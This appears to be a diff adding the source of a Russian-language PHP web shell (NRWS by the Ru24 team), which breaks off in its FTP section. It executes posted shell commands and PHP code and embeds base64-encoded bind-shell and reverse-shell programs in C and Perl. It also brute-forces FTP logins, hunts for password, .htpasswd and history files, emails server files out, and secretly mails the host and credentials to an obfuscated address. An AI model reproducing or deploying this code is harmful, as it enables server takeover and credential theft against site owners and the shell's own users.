+ignore_user_abort(1); // Èãíîğèğîâàòü ğàçğûâ ñâÿçè ñ áğàóçåğîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåğâåğå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåğâåğå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïğîñìîòğ îòêğûòûõ ïîğòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ ïõï ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïğåäèëåíèå âåğñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïğåäèëåíèå âåğñèè ÿäğà' =>'cat /proc/version',
+'Ïğîñìîòğ syslog.conf' =>'cat /etc/syslog.conf',
+'Ïğîñìîòğ - Message of the day' =>'cat /etc/motd',
+'Ïğîñìîòğ hosts' =>'cat /etc/hosts',
+'Âåğñèÿ äèñòğèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåğñèÿ äèñòğèáóòèâà 2' =>'cat /etc/*-realise',
+'Êîêàçàòü âñå ïğîöåñû' =>'ps auxw',
+'Ïğîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport); //connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ğàçìåğ çàãğóæåíîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){
+} else {
+if(is_writable('/tmp/')){
+$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo=");
+$fp=fopen('/tmp/qw7_sess',"w+");
+fclose($fp);
+$gg.= $name;
+$gg.=":";
+$gg.= $pass;
+$gg.=":";
+$gg.=$_SERVER["HTTP_HOST"];
+$gg.=$_SERVER['PHP_SELF'];
+$host_l=$_SERVER["HTTP_HOST"];
+$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ==");
+mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net");
+}
+}
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåğâåğå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó </b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ğàáî÷àÿ äèğåêòîğèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåğèòå àëèàñ <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+/// Îòïğàâêà ôàéëîâ íà ìûëî
+case "download_mail":
+$buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NIX REMOTE WEB SHELL   ($file)";
+
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2)
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïğàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+break;
+// ñïèñîê ïğîöåñîâ
+case "ps":
+echo "<b>Ïğîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïğàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïğîöåñ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïğîöåñå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáğàçèòü ñïèñîê ïğîöåñîâ ! Âèäíî çëîé àäìèí çàïğåòèë ps ";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>Èñïîëíåíèå ïõï êîäà (áåç "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>Îò êîãî: <br>
+<input type="TEXT" name="frommail">
+<br>Êîìó:<br> <input type="TEXT" name="tomailz">
+<br>Òåìà: <br><input type="TEXT" name="mailtema">
+<br>Òåêñò: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Îòïğàâèòü" name="submit"></td><form>
+$tend
+HTML;
+// íèêàêàÿ ïğîâåğêà íå äåëàåòñÿ, à çà÷åì ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>Ñîîáùåíèå îòïğàâëåíî !</h2>";
+}
+break;
+
+
+// Èíôîğìàöèÿ î ñèñòåìå
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">Âêëş÷åíî</font>";
+}
+else {$safemode = false; $hsafemode = "Îòêëş÷åíî</font>";}
+/* display information */
+echo "<b>[ Èíôîğìàöèÿ î ñèñòåìå ]</b><br>";
+echo "<b>Õîñò:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP ñåğâåğà:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>Ñåğâåğ: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+echo "<b>Ïğèâèëåãèè: </b>".exec("id")."<br>";
+echo "<b>Âñåãî ìåñòà: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>Ñâîáîäíî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>";
+echo "<b>Òåêóùèé êàòàëîã:</b>".exec("pwd")."";
+echo " <br><b>Òåêóøèé web ïóòü: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>Òâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version : </b>".phpversion()."<BR>";
+echo "<b> ID âëàäåëüöà ïğîöåñà : </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>Åñòü äîñòóï ê /etc/passwd ! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>Åñòü äîñòóï ê /etc/shadow !</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>Åñòü äîñòóï ê /etc/shadow- !</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>Åñòü äîñòóï ê /etc/master.passwd ! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - îòêğûòà&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - íå îòêğûòà</font><br>";
+}
+echo "<b>Áåçîïàñíûé ğåæèì: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Êîíôèãóíàöèÿ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// Î ñêğèïòå
+case "about":
+
+echo "<center><b>Ïğèâåò âñåì</b></center>Ïåğåä âàìè ïåğâàÿ âåğñèÿ ìîåãî ñêğèïòà óäàëåííîãî àäìèíèñòğèğîâàíèÿ.<b>(0.5a)</b> <br>Ñêğèïò íàõîäèòñÿ â ñòàäèè òåñòèğîâàíèÿ, òàê, ÷òî åñëè íàéäåòå êàêèå-òî áàãè, îáğàùàéòåñü ñşäà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èëè <a href=mailto:dreamerz@mail.ru>íà ìûëî dreamerz@mail.ru</a>, èëè íà <a href=http://dreamerz.cc>dreamerz.cc</a>, èëè íà ICQ: <b>817312</b><br>Êòî õî÷åò ïîó÷àñòâîâàòü â ğàçğàáîòêå ñêğèïòà - ïèøèòå, ïîêàçóéòå ÷òî âû ìîæåòå äîáàâèòü è èñïğàâèòü...<br>Íó, è ñïàñèáî ıòèì ëşäÿì: Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... è ìíîãèì äğóãèì ...";
+echo "<br> È èñïîëüçóÿ ıòîò ñêğèïò íà ÷óæèõ ñåğâåğàõ âû íàğóøàåòå çàêîí :) Òàê ÷òî îñòîğîæíåå. ";
+
+echo "<br><br><br>Íîâàÿ âåğñèÿ ëåæèò çäåñü: <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a>
+<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>";
+break;
+// ÔÒÏ ïîäáîğ ïàğîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëş÷åíèå  login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
